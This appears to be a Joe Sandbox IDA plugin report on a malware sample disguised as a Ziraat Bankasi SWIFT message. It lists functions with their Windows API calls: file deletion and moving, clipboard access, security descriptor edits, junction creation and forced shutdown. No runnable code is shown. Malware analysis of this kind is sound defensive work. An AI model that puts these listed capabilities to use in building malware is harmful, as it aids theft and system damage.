Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 4576d6360e5c9af3a58795efc3f416452a18f14fa77ecf82781c2f83b2de891c
Instruction ID: 99d14787ef448094161cdb16b2e15c3bc26fcac710f39286999549dd2544818c
Opcode Fuzzy Hash: 4576d6360e5c9af3a58795efc3f416452a18f14fa77ecf82781c2f83b2de891c
Instruction Fuzzy Hash: AF818EB1A00209AFEF11DFE4DC45AEEBBB8FF05304F044129F924A6561DB728E55DB61

Function 000C60DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 000C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000C5FA6,?), ref: 000C6ED8

Part of subcall function 000C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,000C5FA6,?), ref: 000C6EF1

Part of subcall function 000C725E: __wsplitpath.LIBCMT ref: 000C727B
Part of subcall function 000C725E: __wsplitpath.LIBCMT ref: 000C728E

Part of subcall function 000C72CB: GetFileAttributesW.KERNEL32(?,000C6019), ref: 000C72CC

_wcscat.LIBCMT ref: 000C6149
_wcscat.LIBCMT ref: 000C6167
__wsplitpath.LIBCMT ref: 000C618E
FindFirstFileW.KERNEL32(?,?), ref: 000C61A4
_wcscpy.LIBCMT ref: 000C6209
_wcscat.LIBCMT ref: 000C621C
_wcscat.LIBCMT ref: 000C622F
lstrcmpiW.KERNEL32(?,?), ref: 000C625D
DeleteFileW.KERNEL32(?), ref: 000C626E
MoveFileW.KERNEL32(?,?), ref: 000C6289
MoveFileW.KERNEL32(?,?), ref: 000C6298
CopyFileW.KERNEL32(?,?,00000000), ref: 000C62AD
DeleteFileW.KERNEL32(?), ref: 000C62BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 000C62E1
FindClose.KERNEL32(00000000), ref: 000C62FD
FindClose.KERNEL32(00000000), ref: 000C630B

Strings

\*.*, xrefs: 000C6138, 000C6147, 000C6165

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*
API String ID: 1917200108-1173974218
Opcode ID: a49a765c52d9a123d5c36961ae5feb60eb0e5b392660f508fefaefb42a1f8f3f
Instruction ID: cf765eeaf80e08ec05d025df2188fa2b58a52d4ffd6bdc75e607a878d6db4e04
Opcode Fuzzy Hash: a49a765c52d9a123d5c36961ae5feb60eb0e5b392660f508fefaefb42a1f8f3f
Instruction Fuzzy Hash: 92510E7290811C6ACB21EB91DC44EEF77FCAF05310F0901EAE585E2142DE769789CFA4

Function 000D6B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0011DC00), ref: 000D6B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 000D6B44
GetClipboardData.USER32(0000000D), ref: 000D6B4C
CloseClipboard.USER32 ref: 000D6B58
GlobalLock.KERNEL32(00000000), ref: 000D6B74
CloseClipboard.USER32 ref: 000D6B7E
GlobalUnlock.KERNEL32(00000000), ref: 000D6B93
IsClipboardFormatAvailable.USER32(00000001), ref: 000D6BA0
GetClipboardData.USER32(00000001), ref: 000D6BA8
GlobalLock.KERNEL32(00000000), ref: 000D6BB5
GlobalUnlock.KERNEL32(00000000), ref: 000D6BE9
CloseClipboard.USER32 ref: 000D6CF6

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: f9958058cfbc9608f3c6daf072df63d0e359c2e97e34d47d74e0d5962bfaea6e
Instruction ID: 7264bfb048063a30417b7d8c1243912f9443676dcb0a09fdb9a4abcf1bbefcfa
Opcode Fuzzy Hash: f9958058cfbc9608f3c6daf072df63d0e359c2e97e34d47d74e0d5962bfaea6e
Instruction Fuzzy Hash: 66517071244301ABD310BBA0DD96FAE77A8AF94B11F00042AF586D62D2DFB1D9858B72

Function 000CF5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 000CF62B
FindClose.KERNEL32(00000000), ref: 000CF67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000CF6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000CF6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 000CF6E2
__swprintf.LIBCMT ref: 000CF72E
__swprintf.LIBCMT ref: 000CF767
__swprintf.LIBCMT ref: 000CF7BB

Part of subcall function 000A172B: __woutput_l.LIBCMT ref: 000A1784

__swprintf.LIBCMT ref: 000CF809
__swprintf.LIBCMT ref: 000CF858
__swprintf.LIBCMT ref: 000CF8A7
__swprintf.LIBCMT ref: 000CF8F6

Strings

%4d, xrefs: 000CF761
%4d%02d%02d%02d%02d%02d, xrefs: 000CF728
%02d, xrefs: 000CF7B0, 000CF7B9, 000CF807, 000CF856, 000CF8A5, 000CF8F4

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: c859feda1b14214bbe05e6252b271f6c0a38e3a18423a44404333aaa0105e7a1
Instruction ID: 608f5d45f8ecd78455a4bb7892b671087b15c61e03b015d4c7d8ef7ace935659
Opcode Fuzzy Hash: c859feda1b14214bbe05e6252b271f6c0a38e3a18423a44404333aaa0105e7a1
Instruction Fuzzy Hash: F7A10CB2408344ABD710FBA4C885DEFB7ECBF98704F44092EF59582192EB34D949DB62

Function 000D1B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 000D1B50
_wcscmp.LIBCMT ref: 000D1B65
_wcscmp.LIBCMT ref: 000D1B7C
GetFileAttributesW.KERNEL32(?), ref: 000D1B8E
SetFileAttributesW.KERNEL32(?,?), ref: 000D1BA8
FindNextFileW.KERNEL32(00000000,?), ref: 000D1BC0
FindClose.KERNEL32(00000000), ref: 000D1BCB
FindFirstFileW.KERNEL32(*.*,?), ref: 000D1BE7
_wcscmp.LIBCMT ref: 000D1C0E
_wcscmp.LIBCMT ref: 000D1C25
SetCurrentDirectoryW.KERNEL32(?), ref: 000D1C37
SetCurrentDirectoryW.KERNEL32(001339FC), ref: 000D1C55
FindNextFileW.KERNEL32(00000000,00000010), ref: 000D1C5F
FindClose.KERNEL32(00000000), ref: 000D1C6C
FindClose.KERNEL32(00000000), ref: 000D1C7C

Strings

*.*, xrefs: 000D1BE2

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: b8dfa699bb90ed39d1970a555f0663a8a642ab74d088ad7d0f1c7ffca55641e5
Instruction ID: 3a0a21db5c610979e1b01d9f176a1aac1ae524c92be15fb4461cf105431af203
Opcode Fuzzy Hash: b8dfa699bb90ed39d1970a555f0663a8a642ab74d088ad7d0f1c7ffca55641e5
Instruction Fuzzy Hash: AF31A232A40719BADB10ABF0EC49ADE77EC9F05320F140197E811E3191EFB0DA858B64

Function 000D1C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 000D1CAB
_wcscmp.LIBCMT ref: 000D1CC0
_wcscmp.LIBCMT ref: 000D1CD7

Part of subcall function 000C6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 000C6BEF

FindNextFileW.KERNEL32(00000000,?), ref: 000D1D06
FindClose.KERNEL32(00000000), ref: 000D1D11
FindFirstFileW.KERNEL32(*.*,?), ref: 000D1D2D
_wcscmp.LIBCMT ref: 000D1D54
_wcscmp.LIBCMT ref: 000D1D6B
SetCurrentDirectoryW.KERNEL32(?), ref: 000D1D7D
SetCurrentDirectoryW.KERNEL32(001339FC), ref: 000D1D9B
FindNextFileW.KERNEL32(00000000,00000010), ref: 000D1DA5
FindClose.KERNEL32(00000000), ref: 000D1DB2
FindClose.KERNEL32(00000000), ref: 000D1DC2

Strings

*.*, xrefs: 000D1D28

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: fa29f4bc04f45ab549cfb2814c7732a1a0aec81a00a03c7e5b5edb922a10e3aa
Instruction ID: 3df46952a36b1e74e0c616900904d9035340ff2f5c3f147b249dd007ccc4bdcd
Opcode Fuzzy Hash: fa29f4bc04f45ab549cfb2814c7732a1a0aec81a00a03c7e5b5edb922a10e3aa
Instruction Fuzzy Hash: 9A31B03290471ABACF60ABE0EC49ADE77AE9F45324F140596F811A3291DF70DA85CB74

Function 000CD0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 000CD0D8
__swprintf.LIBCMT ref: 000CD0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 000CD137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 000CD15C
_memset.LIBCMT ref: 000CD17B
_wcsncpy.LIBCMT ref: 000CD1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 000CD1EC
CloseHandle.KERNEL32(00000000), ref: 000CD1F7
RemoveDirectoryW.KERNEL32(?), ref: 000CD200
CloseHandle.KERNEL32(00000000), ref: 000CD20A

Strings

:, xrefs: 000CD11B
\, xrefs: 000CD110
\??\%s, xrefs: 000CD0F4

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 32f698fa1ab5c2371930461e2968d0e71ed22ba2edbce9f9ec09e265f9bb1478
Instruction ID: 782845cb9f8cd84f31b314319b2a0ac0a0d20481de3e4de6eb76d80d88b79c3c
Opcode Fuzzy Hash: 32f698fa1ab5c2371930461e2968d0e71ed22ba2edbce9f9ec09e265f9bb1478
Instruction Fuzzy Hash: 9031AFB650010AABDB21DFA0DC49FEF37BCEF89740F1041BAF909D2161EB7096848B24

Function 000BA66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000BABD7
Part of subcall function 000BABBB: GetLastError.KERNEL32(?,000BA69F,?,?,?), ref: 000BABE1
Part of subcall function 000BABBB: GetProcessHeap.KERNEL32(00000008,?,?,000BA69F,?,?,?), ref: 000BABF0
Part of subcall function 000BABBB: HeapAlloc.KERNEL32(00000000,?,000BA69F,?,?,?), ref: 000BABF7
Part of subcall function 000BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000BAC0E

Part of subcall function 000BAC56: GetProcessHeap.KERNEL32(00000008,000BA6B5,00000000,00000000,?,000BA6B5,?), ref: 000BAC62
Part of subcall function 000BAC56: HeapAlloc.KERNEL32(00000000,?,000BA6B5,?), ref: 000BAC69
Part of subcall function 000BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,000BA6B5,?), ref: 000BAC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000BA6D0
_memset.LIBCMT ref: 000BA6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000BA704
GetLengthSid.ADVAPI32(?), ref: 000BA715
GetAce.ADVAPI32(?,00000000,?), ref: 000BA752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000BA76E
GetLengthSid.ADVAPI32(?), ref: 000BA78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 000BA79A
HeapAlloc.KERNEL32(00000000), ref: 000BA7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 000BA7C2
CopySid.ADVAPI32(00000000), ref: 000BA7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000BA7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000BA820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 000BA834

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: e2572fb780a3d85386e80cdbb14e4f526a47e6266e8d81b07461cdc6c3db4394
Instruction ID: ee5702ca2787a60b616c87b1f4a5a3e2e32b881135d045ad2d7a1c62a64423db
Opcode Fuzzy Hash: e2572fb780a3d85386e80cdbb14e4f526a47e6266e8d81b07461cdc6c3db4394
Instruction Fuzzy Hash: 08515A71A0020AABDF00DFA5DC45EEEBBB9FF09300F048129F915A7691DB749A46CB61

Function 00086F07 Relevance: 18.4, Strings: 14, Instructions: 883COMMON

Download Yara Rule

Strings

BSR_ANYCRLF), xrefs: 00102EA0
NO_START_OPT), xrefs: 00102CD1
ANY), xrefs: 00102E60
LIMIT_MATCH=, xrefs: 00102CF2
CR), xrefs: 00102E09
UTF), xrefs: 00102C7C
LF), xrefs: 00102E26
UTF16), xrefs: 00102C56
UCP), xrefs: 00102C8F
LIMIT_RECURSION=, xrefs: 00102D7E
CRLF), xrefs: 00102E43
NO_AUTO_POSSESS), xrefs: 00102CB0
ANYCRLF), xrefs: 00102E7D
BSR_UNICODE), xrefs: 00102EBA

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: 1c22304cbd5ce71578df01328c2caeee32e7e2b8aafab6f89d210f6be35bfc5e
Instruction ID: 7a61442f97bf6c1c7a49e3db6d7e6bc3690ee24bf41d2d4e04a56ceef693dffb
Opcode Fuzzy Hash: 1c22304cbd5ce71578df01328c2caeee32e7e2b8aafab6f89d210f6be35bfc5e
Instruction Fuzzy Hash: F5727371E04219DBDF24DF98C8407EEB7B5BF48310F24816AE999EB285DB709E41DB90

Function 000C63F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000C5FA6,?), ref: 000C6ED8

Part of subcall function 000C72CB: GetFileAttributesW.KERNEL32(?,000C6019), ref: 000C72CC

_wcscat.LIBCMT ref: 000C6441
__wsplitpath.LIBCMT ref: 000C645F
FindFirstFileW.KERNEL32(?,?), ref: 000C6474
_wcscpy.LIBCMT ref: 000C64A3
_wcscat.LIBCMT ref: 000C64B8
_wcscat.LIBCMT ref: 000C64CA
DeleteFileW.KERNEL32(?), ref: 000C64DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 000C64EB
FindClose.KERNEL32(00000000), ref: 000C6506

Strings

\*.*, xrefs: 000C643B

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: d2c228beac4376225508e4eb424b9e8f3f530bfda923b660da86f2fdbe608437
Instruction ID: d985a5a01471a540b5a024935cc5ac737d8a1b66a50f79bf5b90fc31466f18fc
Opcode Fuzzy Hash: d2c228beac4376225508e4eb424b9e8f3f530bfda923b660da86f2fdbe608437
Instruction Fuzzy Hash: 123144B24083889AC731EBE48885EDFB7DCAF56310F44491EF5D9C3142EA36D5498767

Function 000D6D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 000D6D2E
EmptyClipboard.USER32 ref: 000D6D34
GlobalAlloc.KERNEL32(00000002,?), ref: 000D6D49
CloseClipboard.USER32 ref: 000D6DE8

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: d68ddd79950484310a78aa8edca6e35ea9042267b32f69c6fbf3732b1877500a
Instruction ID: 891d730576f5b87f00b47d2e3c4cbfd55ed56a95c349e44b47c3bbd6efc2b972
Opcode Fuzzy Hash: d68ddd79950484310a78aa8edca6e35ea9042267b32f69c6fbf3732b1877500a
Instruction Fuzzy Hash: 1721A131700214AFDB11AFA4EC49F6D77A9FF04710F04801AF98ADB262CB72ED418B61

Function 000DC18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 000B9ABF: CLSIDFromProgID.OLE32 ref: 000B9ADC
Part of subcall function 000B9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 000B9AF7
Part of subcall function 000B9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 000B9B05
Part of subcall function 000B9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 000B9B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 000DC235
_memset.LIBCMT ref: 000DC242
_memset.LIBCMT ref: 000DC360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 000DC38C
CoTaskMemFree.OLE32(?), ref: 000DC397

Strings

NULL Pointer assignment, xrefs: 000DC3E5

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 2f8b89532f7329858a1b610d9819ac284515b6cd2aba0544e4571be1d6ac978e
Instruction ID: 3d1e9538031a224e6e47265f9e6cfcd86442da4a874cb6f0f09363dd52513b42
Opcode Fuzzy Hash: 2f8b89532f7329858a1b610d9819ac284515b6cd2aba0544e4571be1d6ac978e
Instruction Fuzzy Hash: E9913C71D00219ABDB10DFA4DC95EDEBBB9FF08710F10815AF515A7282EB719A45CFA0

Function 000D1F94 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 000D1FE1
Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 000D2011
_wcscmp.LIBCMT ref: 000D2025
_wcscmp.LIBCMT ref: 000D2040
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 000D20DE
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 000D20F4

Strings

*.*, xrefs: 000D1FC3

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep
String ID: *.*
API String ID: 3356411064-438819550
Opcode ID: 04f5223bca9f16c05debdae3301642ac0e319026db5ddc7ed5d89ee49c526e31
Instruction ID: 4356b7a7b7fca8fcc879fed4064e3575c2bcb422a7acb776f6439d64eeb62b83
Opcode Fuzzy Hash: 04f5223bca9f16c05debdae3301642ac0e319026db5ddc7ed5d89ee49c526e31
Instruction Fuzzy Hash: 7E418E7190030AAFCF64EFA4CC49BEEBBB4FF15314F144456E855A3292EB709A84CB60

Function 000C79D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 000BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000BB180
Part of subcall function 000BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000BB1AD
Part of subcall function 000BB134: GetLastError.KERNEL32 ref: 000BB1BA

ExitWindowsEx.USER32(?,00000000), ref: 000C7A0F

Strings

@, xrefs: 000C7A02
SeShutdownPrivilege, xrefs: 000C79DD
, xrefs: 000C79FD

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
